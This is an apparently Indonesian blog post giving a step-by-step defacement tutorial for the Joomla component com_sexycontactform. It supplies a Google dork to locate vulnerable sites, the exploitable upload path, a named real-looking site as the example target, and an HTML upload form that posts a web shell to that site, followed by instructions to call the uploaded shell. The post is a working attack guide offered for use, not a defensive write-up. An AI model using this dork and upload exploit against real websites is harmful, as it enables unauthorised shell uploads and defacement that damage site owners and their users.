Shell : Cari di gogle banyak :p
Dork : inurl:/com_sexycontactform/ site:id <<--- bisa diganti contoh: .com.br, co.uk , .il ,.net dll
Exploit : components/com_sexycontactform/fileupload/index.php
Langkah" :
1.masukkan dork ke google lalu cari target ..
2.lalu untuk mengecheck itu vuln atau tidak bisa dengan cara memasukkan exploit dibelakang url target
contoh: www.maltvault.com.sg/components/com_sexycontactform/fileupload/index.php lalu enter :D
3.kalo ada tulisan file [] atau semacam nya bla bla itu VULn bisa dideface :D Lihat gambar dibawah
Vuln:4.kalo error / not found atau kembali ke halaman awal itu gak Vuln .
5.lalu setelah mendapat yg vuln, siapkan exploit truss save dengan menggukan Html :D
copy code ini CSRF ini :
<form method="POST" action="http://www.maltvault.com.sg/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Lihat Gambar :
6.Setelah itu kalian tinggal panggil deh shell kalian sama kayak saya di bawah ini :)
selesai jons :'v
0 komentar:
Posting Komentar